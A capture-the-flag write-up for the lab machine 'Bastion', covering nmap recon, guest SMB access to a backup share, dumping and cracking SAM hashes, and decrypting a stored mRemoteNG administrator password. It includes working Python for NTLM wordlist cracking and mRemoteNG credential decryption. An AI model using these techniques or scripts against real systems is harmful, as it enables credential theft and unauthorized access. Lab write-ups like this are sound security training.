
Bastion Write up

Welcome to my Bastion write-up.

Recon

Nmap

$ sudo nmap -sSVC -A -oA nmap/bastion 10.10.10.134

Nmap scan report for 10.10.10.134
Host is up (0.069s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a56ae753c780ec8564dcb1c22bf458a (RSA)
|   256 cc2e56ab1997d5bb03fb82cd63da6801 (ECDSA)
|_  256 935f5daaca9f53e7f282e664a8a3a018 (ED25519)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
.
.
.
Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-06-13T18:00:17
|_  start_date: 2023-06-13T17:58:56
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-06-13T20:00:19+02:00
|_clock-skew: mean: -39m57s, deviation: 1h09m14s, median: 0s

All Ports Scan (the default scan only covers the top 1000 TCP ports; scanning all 65535 also turns up WinRM on 5985):

$ nmap -p- -Pn -A -T4 10.10.10.134

Nmap scan report for 10.10.10.134
Host is up (0.11s latency).
Not shown: 65522 closed tcp ports (conn-refused)
PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a56ae753c780ec8564dcb1c22bf458a (RSA)
|   256 cc2e56ab1997d5bb03fb82cd63da6801 (ECDSA)
|_  256 935f5daaca9f53e7f282e664a8a3a018 (ED25519)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
|_clock-skew: mean: -39m59s, deviation: 1h09m15s, median: 0s
| smb2-time: 
|   date: 2023-06-13T18:02:18
|_  start_date: 2023-06-13T17:58:56
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-06-13T20:02:16+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

SMB

We will start by listing shares with smbclient. The nmap host scripts already showed “account_used: guest”, so a null session (-N, no password) is enough:

$ smbclient -L //10.10.10.134 -N


There is an interesting share named “Backups”. Let’s access it with the same blank-password trick (the username does not matter, because the server falls back to guest):

$ smbclient //10.10.10.134/Backups -U 'user%'


Download everything with “mget *”.

The share contains Windows image backups, i.e. .vhd disk images, which are far too large to pull down with mget. Instead, mount the share locally and read the image in place.

Initial Foothold

$ sudo mount -t cifs //10.10.10.134/Backups /mnt -o user=user,password=


The mounted share holds a .vhd disk image. guestmount can open it straight from the share, read-only (--ro, so nothing in the backup is modified); --inspector detects the guest OS and mounts its filesystems for us. Run it from the directory on the share that contains the .vhd (or pass the full path), and make sure /mnt2 exists.

Note: guestmount is part of libguestfs; install it with: sudo apt install libguestfs-tools

$ sudo guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt2/


The guest’s filesystem is now under /mnt2. The SAM hive stores the local account hashes, encrypted with a boot key kept in the SYSTEM hive, so both files are needed:

# cd /mnt2/Windows/System32/config


# samdump2 ./SYSTEM ./SAM

Crack the hash

samdump2 prints pwdump-style lines (user:RID:LM hash:NT hash:::). The NT hash for L4mpje is an unsalted MD4 of the UTF-16LE password, so a precomputed lookup such as https://crackstation.net/ resolves it instantly (hashcat -m 1000 against a wordlist would do the same offline). The result:

L4mpje:Bureaulampje
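The offline equivalent of the crackstation lookup, as an added example that is not code from the original post: it computes NT hashes (MD4 over the UTF-16LE password) and runs a wordlist against samdump2-style output. MD4 is implemented in pure Python because hashlib’s md4 is frequently missing under OpenSSL 3. The sample dump and wordlist are constructed for the demo; the Administrator hash in it is a made-up value that will not crack, and the L4mpje line is built from the password recovered above.

```python
"""Offline NTLM (NT hash) wordlist attack against samdump2 output.

NT hash = MD4(UTF-16LE(password)), unsalted. MD4 is implemented here (RFC 1320)
because hashlib.new("md4") is often unavailable under OpenSSL 3.
"""
import struct

MASK = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 digest of data."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & MASK

    # Padding: 0x80, zeros to 56 mod 64, then the 64-bit little-endian bit length.
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)

    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (  # (function, additive constant, shift amounts, word order)
        (f, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for func, const, shifts, order in rounds:
            for i, k in enumerate(order):
                a = rotl((a + func(b, c, d) + x[k] + const) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers so each step updates "a"
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """Windows NT hash as lowercase hex."""
    return md4(password.encode("utf-16le")).hex()


def parse_pwdump(text: str) -> dict:
    """Map username -> NT hash from samdump2 lines of the form user:rid:lm:nt:::."""
    users = {}
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) >= 4 and len(parts[3]) == 32:
            users[parts[0]] = parts[3].lower()
    return users


def crack(users: dict, wordlist) -> dict:
    """Hash each candidate once and match it against every target hash."""
    targets = {}
    for user, h in users.items():
        targets.setdefault(h, []).append(user)  # several accounts may share a hash
    found = {}
    for word in wordlist:
        h = nt_hash(word)
        for user in targets.get(h, ()):
            found[user] = word
    return found


# Constructed sample in samdump2 format (not the real dump from the box):
# the Administrator hash is a made-up value that will not crack, Guest has the
# well-known empty-password hash, L4mpje is built from the recovered password.
SAMPLE_DUMP = "\n".join([
    "Administrator:500:" + EMPTY_LM + ":" + "0" * 32 + ":::",
    "Guest:501:" + EMPTY_LM + ":31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "L4mpje:1000:" + EMPTY_LM + ":" + nt_hash("Bureaulampje") + ":::",
])
WORDLIST = ["password", "Welcome1", "", "Bureaulampje", "bastion"]  # constructed


def demo() -> dict:
    return crack(parse_pwdump(SAMPLE_DUMP), WORDLIST)


if __name__ == "__main__":
    for user, pw in demo().items():
        print(f"{user}:{pw}")
```

Because the NT hash is unsalted, one MD4 per candidate word covers every account in the dump at once, which is exactly why lookup tables like crackstation work so well against it.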

$ ssh L4mpje@10.10.10.134



Privilege Escalation

l4mpje@BASTION C:\Users\L4mpje>cd C:\Users\L4mpje\AppData\Roaming\mRemoteNG


l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir


l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml


mRemoteNG is installed, and its confCons.xml stores saved connections, including an entry for the administrator. The Password attribute is not a hash: it is the password encrypted with AES-GCM under a key derived from mRemoteNG’s default master password, so it can be decrypted rather than cracked.

To decrypt it we can use mremoteng_decrypt: https://github.com/haseebT/mRemoteNG-Decrypt

$ ./mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
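What the linked tool does, written out as an added example (my code, not the page’s and not the mRemoteNG-Decrypt project’s): the base64 blob is salt(16) || nonce(16) || ciphertext || GCM tag(16), the AES-256 key is PBKDF2-HMAC-SHA1 over the master password with that salt and 1000 iterations, and the salt doubles as GCM associated data. mRemoteNG’s default master password is “mR3m”. AES-GCM comes from the cryptography package, with pycryptodome as a fallback (an assumption about what is installed); the confCons.xml fragment, its hostname and its password are constructed for the demo, not taken from the box.

```python
"""Decrypt passwords stored in an mRemoteNG confCons.xml (the 1.75+ AES-GCM format).

Blob layout after base64 decoding: salt(16) || nonce(16) || ciphertext || GCM tag(16).
Key = PBKDF2-HMAC-SHA1(master password, salt, 1000 iterations, 32 bytes); the salt
is also passed to GCM as associated data. The default master password is "mR3m".
"""
import base64
import hashlib
import os
import xml.etree.ElementTree as ET

try:  # pip install cryptography ...
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM

    def _gcm_encrypt(key, nonce, pt, aad):
        out = AESGCM(key).encrypt(nonce, pt, aad)
        return out[:-16], out[-16:]

    def _gcm_decrypt(key, nonce, ct, tag, aad):
        return AESGCM(key).decrypt(nonce, ct + tag, aad)
except ImportError:  # ... or pip install pycryptodome (what the linked tool uses)
    from Crypto.Cipher import AES

    def _gcm_encrypt(key, nonce, pt, aad):
        c = AES.new(key, AES.MODE_GCM, nonce=nonce)
        c.update(aad)
        return c.encrypt_and_digest(pt)

    def _gcm_decrypt(key, nonce, ct, tag, aad):
        c = AES.new(key, AES.MODE_GCM, nonce=nonce)
        c.update(aad)
        return c.decrypt_and_verify(ct, tag)

DEFAULT_MASTER = "mR3m"


def derive_key(master: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", master.encode(), salt, 1000, dklen=32)


def split_blob(b64: str) -> dict:
    raw = base64.b64decode(b64)
    if len(raw) < 48:
        raise ValueError("blob shorter than salt + nonce + tag")
    return {"salt": raw[:16], "nonce": raw[16:32], "ciphertext": raw[32:-16], "tag": raw[-16:]}


def decrypt_password(b64: str, master: str = DEFAULT_MASTER) -> str:
    p = split_blob(b64)
    key = derive_key(master, p["salt"])
    return _gcm_decrypt(key, p["nonce"], p["ciphertext"], p["tag"], p["salt"]).decode("utf-8")


def encrypt_password(plaintext: str, master: str = DEFAULT_MASTER) -> str:
    """Inverse operation, used here only to build an offline test vector."""
    salt, nonce = os.urandom(16), os.urandom(16)
    ct, tag = _gcm_encrypt(derive_key(master, salt), nonce, plaintext.encode(), salt)
    return base64.b64encode(salt + nonce + ct + tag).decode()


def extract_credentials(xml_text: str, master: str = DEFAULT_MASTER) -> list:
    """Walk every <Node> and return its connection details with the password decrypted.
    A failed GCM tag check (wrong master password, tampered blob) yields None."""
    creds = []
    for node in ET.fromstring(xml_text).iter("Node"):
        blob = node.get("Password", "")
        try:
            clear = decrypt_password(blob, master) if blob else ""
        except Exception:
            clear = None
        creds.append({"name": node.get("Name"), "host": node.get("Hostname"),
                      "user": node.get("Username"), "password": clear})
    return creds


def sample_confcons() -> str:
    """Constructed confCons.xml fragment (hostname and password are made up for the demo)."""
    blob = encrypt_password("S3cret!")
    return (
        '<?xml version="1.0" encoding="utf-8"?>'
        '<Connections Name="Connections" Export="false" Protected="" ConfVersion="2.6">'
        '<Node Name="DC" Type="Connection" Username="Administrator" Domain="" '
        f'Hostname="192.0.2.10" Protocol="RDP" Password="{blob}" />'
        "</Connections>"
    )


if __name__ == "__main__":
    for cred in extract_credentials(sample_confcons()):
        print(cred)
```

If the user had set a custom master password, the same function can be driven from a wordlist: every wrong guess fails the GCM tag check and comes back as None, so only the right master password produces output.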


With the decrypted password, SSH in as administrator from the attacking machine:

$ ssh administrator@10.10.10.134

This post is licensed under CC BY 4.0 by the author.